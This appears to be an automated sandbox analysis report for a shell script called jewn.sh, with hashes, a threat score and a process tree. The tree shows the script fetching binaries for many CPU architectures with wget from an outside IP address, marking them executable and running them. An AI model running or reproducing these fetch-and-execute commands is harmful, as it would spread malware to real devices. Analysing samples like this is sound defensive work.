Analysis
-
max time kernel
0s -
max time network
124s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20221111-en -
resource tags
arch:mipselimage:debian9-mipsel-20221111-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
08-02-2023 06:31
Static task
static1
Behavioral task
behavioral1
Sample
jewn.sh
Resource
ubuntu1804-amd64-en-20211208
ubuntu-18.04-amd64
1 signatures
150 seconds
Behavioral task
behavioral2
Sample
jewn.sh
Resource
debian9-armhf-20221111-en
debian-9-armhf
1 signatures
150 seconds
Behavioral task
behavioral3
Sample
jewn.sh
Resource
debian9-mipsbe-en-20211208
debian-9-mips
1 signatures
150 seconds
Behavioral task
behavioral4
Sample
jewn.sh
Resource
debian9-mipsel-20221111-en
debian-9-mipsel
1 signatures
150 seconds
General
-
Target
jewn.sh
-
Size
1KB
-
MD5
2097bb27333c25ce9708e90de1604d99
-
SHA1
5e26a804a9ee8922e12e8eb3aab85cdd83235ebb
-
SHA256
fc888d0e281f668aa43f5b266eaf0f69edd56eb7c47d32a005de9ab268fc8645
-
SHA512
7417d2e7a5c2266038244ccf0c9efcc6007766e10221f8fc65f74bc5559e060d0d0ee771cd8eaaf9db5269d4cf1af84bc07f65dff60a89d64565a721dd64eb53
Score
5/10
Malware Config
Signatures
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process /tmp/jewn.sh /tmp/jewn.sh jewn.sh
Processes
-
/tmp/jewn.sh/tmp/jewn.sh1⤵
- Writes file to tmp directory
PID:325 -
/usr/bin/wgetwget http://194.180.48.156/bins/jew.x862⤵PID:326
-
-
/bin/catcat jew.x862⤵PID:332
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm72⤵PID:333
-
-
./jewn./jewn2⤵PID:334
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.mips2⤵PID:336
-
-
/bin/catcat jew.mips2⤵PID:338
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm72⤵PID:339
-
-
./jewn./jewn2⤵PID:340
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.mpsl2⤵PID:342
-
-
/bin/catcat jew.mpsl2⤵PID:344
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm72⤵PID:345
-
-
./jewn./jewn2⤵PID:346
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.arm42⤵PID:348
-
-
/bin/catcat jew.arm42⤵PID:350
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm72⤵PID:351
-
-
./jewn./jewn2⤵PID:352
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.arm52⤵PID:354
-
-
/bin/catcat jew.arm52⤵PID:356
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm72⤵PID:357
-
-
./jewn./jewn2⤵PID:358
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.arm62⤵PID:360
-
-
/bin/catcat jew.arm62⤵PID:362
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm72⤵PID:363
-
-
./jewn./jewn2⤵PID:364
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.arm72⤵PID:366
-
-
/bin/catcat jew.arm72⤵PID:368
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm72⤵PID:369
-
-
./jewn./jewn2⤵PID:370
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.ppc2⤵PID:372
-
-
/bin/catcat jew.ppc2⤵PID:374
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm72⤵PID:375
-
-
./jewn./jewn2⤵PID:376
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.m68k2⤵PID:378
-
-
/bin/catcat jew.m68k2⤵PID:380
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm72⤵PID:381
-
-
./jewn./jewn2⤵PID:382
-
-
/usr/bin/wgetwget http://194.180.48.156/bins/jew.sh42⤵PID:384
-
-
/bin/catcat jew.sh42⤵PID:386
-
-
/bin/chmodchmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm72⤵PID:387
-
-
./jewn./jewn2⤵PID:388
-